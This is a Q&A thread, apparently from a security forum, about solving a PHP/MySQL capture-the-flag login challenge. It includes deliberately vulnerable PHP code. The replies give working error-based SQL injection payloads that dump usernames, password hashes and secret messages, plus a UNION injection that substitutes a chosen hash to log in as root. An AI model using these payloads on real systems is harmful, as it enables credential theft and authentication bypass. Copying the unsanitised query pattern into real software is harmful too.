# Exploiting MD5/Salt Vulnerability in this PHP form?

Tags: php, sql-injection, mysql, md5, ctf

I've been practicing security-related subjects and this challenge has befuddled me.
Note: I can't access any PHP source code, nor can I edit it. I'm only able to view it.

The following is given:

1. I have two inputs, "user" and "pass"
2. After 30 times the form is sent, the salt, the hashes and the final solution change. So bruteforce isn't an option (sadly!)
3. @The bottom of the page (not shown in the code for some reason), it echos that it found `9 users` (calling the getnumberofusers() function)

**I've managed to extract this:**

username = root

hashed password = 551e18b35e17017742a8ce4ed27f626e

Token (possibly salt?) = 0St31ez14wOT6jTh

What I've attempted thus far with unsuccessful results:

- Using SQL injection, select a known MD5 collision as `password` and send its counterpart as "`pass`", however the salt is bothering this process. Clearly I couldn't bruteforce this because after 30 attempts the salt would change.

  - I tried finding the entire list of users but it doesn't print the output anywhere (only errors)

This is the code we receive:

```
<?php
//by Mawekl
//Objective: login as root.
//Objective is NOT:
// - Blind SQLI
// - Bruteforce password/salt/id

#WARNING
#ANTI-BLIND
#for every 30 queries
#all hashes, salt
#and final solution
#will be reset.

function getnumberofusers()
{
    $q = "SELECT 1 FROM `sqlinjection1`";
    $r = mysql_query($q);
    return 'Number of users: '  . mysql_num_rows($r);
}

function getinfo($user)
{
    $q = "SELECT `id`, `password` FROM `sqlinjection1` WHERE `username`='$user'";
    $r = mysql_query($q);
    if(!$r)
        return mysql_error();
    $r = mysql_fetch_array($r);
    if(!$r)
        return "Username doesn't exists.";
    return $r;
}

function getfullinfo($id)
{
    $q = "SELECT * FROM `sqlinjection1` WHERE `id`=$id";
    $r = mysql_query($q);
    if(!$r)
        return mysql_error();
    $r = mysql_fetch_array($r);
    if(!$r)
        return "What the hell?!";
    return $r;
}

function confirmpassword($pass, $passcorrect, $salt)
{
    $pass = md5(md5(md5($pass)).$salt);
    return $pass===$passcorrect;
}

function challenge($user, $pass)
{
    $info = getinfo($user);
    if(!is_array($info))
        return $info;
    $confirm = confirmpassword($pass, $info['password'], $_ENV['ST_SALT']);
    if(!$confirm)
        return 'Wrong password!';
    $info = getfullinfo($info['id']);
    if(!is_array($info))
        return $info;
    $returnmessage = "Welcome " . $info['username'] . "!" . PHP_EOL .
    $info['welcomemessage'] . PHP_EOL;
    return $returnmessage;
}

?>
```

Any help is appreciated, and if you have any questions I'd love to clarify my question!

Comment: @grc  Yeah, I was able to find the SQL version (>5). Is there any info you need to be dumped?

Comment: @grc Couldn't figure out how to do that. What's the query that will do that?

Comment: You could try the error-based methods [here](http://security.stackexchange.com/a/121207/28626) or [here](https://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/). They won't help you with the salt though.

Comment: @Tom try to read the `welcomemessage ` column. It may have something useful

Comment: @Sravan You're right! Post this as an answer and I'll mark it as correct haha thanks

Comment: @Tom.. Sure Tom.. welcomemessage  has the salt?

Comment: It gives the answer, but the answer doesn't seem to be correct... Is it possible that this query: ' AND extractvalue(rand(),(SELECT concat(welcomemessage) FROM `sqlinjection1` LIMIT 8,1))#
 is limiting the amount of text that is returned?

Comment: @grc That limits the subquery. Select 1 row with offset 8. (so the 9th row)

Comment: My bad. The error message may have a limit - maybe you could pull the text out in chunks?

Comment: @grc Tried with substr, I get this: Token: c1EZ3dmRGGrtUFMx However that doesn't seem to be the final answer... Could this be the salt? O.O

Comment: @Tom try this one username=`1' or exp(~(select * from (select welcomemessage from sqlinjection1 where username='root')a))  or '1'='1` and some password

Answer (score 2):

From source code we can see that `sqlinjection1` has four known columns `username,password,welcomemessage,id`.

As people pointed in commnets,We can use error based Sql injection to get the usernames,passwords,welcomemessage,id etc.

Post below parameters in sqli

$user=`1' or exp(~(select * from (select concat_ws(':',username,password,welcomemessage,id) from sqlinjection1 limit 1)a))  or '1'='1`

$pass=`something`

The error printed is

```
'DOUBLE value is out of range in &#39;exp(~((select &#39;user1:pass1:secret message:1&#39; from dual)))&#39;
```

So username=user1,password=pass1,welcomemessage=secret message and id=1

Now we can get list of next user using

$user=`1' or exp(~(select * from (select concat_ws(':',username,password,welcomemessage,id) from sqlinjection1 where username!='user1' limit 1)a))  or '1'='1`

$pass=`something`

Similarly for other users change the `where` clause and execute..

We can select single column for a single user as well simply using

$user=`1' or exp(~(select * from (select welcomemessage from sqlinjection1 where username='user1')a))  or '1'='1`

Comment: Awesome. Now I have this. Token = 0St31ez14wOT6jTh, Password = 551e18b35e17017742a8ce4ed27f626e. Is it possible to find the password?

Comment: @Tom Since the token is random, we can do a dictionary attack. I guess  a attack using some worst 1000-5000 passwords on internet will do the job

Comment: I was thinking about selecting its hashed version using SQL injection. I'll try it and let you know.

Comment: @Tom, You are damn right. We dont need to crack the hash, We can set the hash using sql injection :)

Comment: @Tom  Taking the above token as hash confirmpassword('mypass') generates 722430d39a07e7b218a368c06c665fb9 . So inject username=`nonexist' UNION Select id,'722430d39a07e7b218a368c06c665fb9' from sqlinjection1 where username='root`&pass=mypass

Comment: I've tried the exact same thing albeit with unsuccessful results. Here's my documentation of the process, would love it if you could find any mistakes there: http://pastebin.com/miqBabtN

Comment: Also here's a link to the challenge itself so you can try things: http://www.securitytraps.pl/challs/rootslair/

Comment: Let us [continue this discussion in chat](http://chat.stackexchange.com/rooms/41096/discussion-between-tom-and-sravan).